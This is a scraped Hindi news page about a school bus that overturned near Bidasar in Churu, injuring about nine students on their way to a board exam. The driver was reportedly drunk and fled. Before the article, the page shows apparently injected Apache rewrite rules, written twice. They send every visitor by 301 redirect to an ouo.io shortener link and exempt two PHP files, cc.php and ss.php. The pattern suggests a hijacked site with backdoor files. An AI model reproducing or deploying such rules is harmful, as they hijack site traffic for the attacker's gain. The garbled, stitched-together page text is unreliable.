
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 460
Previous Nextचूरू। बीदासर के पास कुहाड़िया से धातरी गांव के बीच कल दोपहर में एक स्कूली बस पलटने से करीब 9 बच्चे गंभीर रूप से घायल हो गए। घायल सभी बच्चों को राजकीय बगड़िया अस्पताल में भर्ती करवाया गया है। इनमें से 3 बच्चों को गंभीर चोटें आई हैं। हादसे के समय बस चालक नशे में धुत बताया जा रहा है। हादसे के बाद चालक बस छोड़कर फरार हो गया। घायल बच्चों ने बताया कि धातरी गांव के श्री पीर तेजू माध्यमिक स्कूल व राजकीय माध्यमिक स्कूल के बच्चों की बोर्ड की परीक्षा का केन्द्र आबसर गांव आया है। बोर्ड की परीक्षा देने जाने के लिए ग्रामीणों ने ही बच्चों के लिए बस की व्यवस्था की थी। बताया जा रहा है कि बस में 63 बच्चे सवार थे और ये सभी कल अंग्रेजी का पेपर देने जा रहे थे तभी यह हादसा हो गया। सूचना पर ग्रामीण मौके पर पहुंचे और दूसरे वाहनों से घायल बच्चों को सुजानगढ़ अस्पताल पहुंचाया। सभी बच्चों की हालत खतरे से बाहर है। बस पलटने की सूचना मिलने पर छापर थानाधिकारी व पुलिसकर्मी मौके पर पहुंचे और स्थिति का जायजा लिया।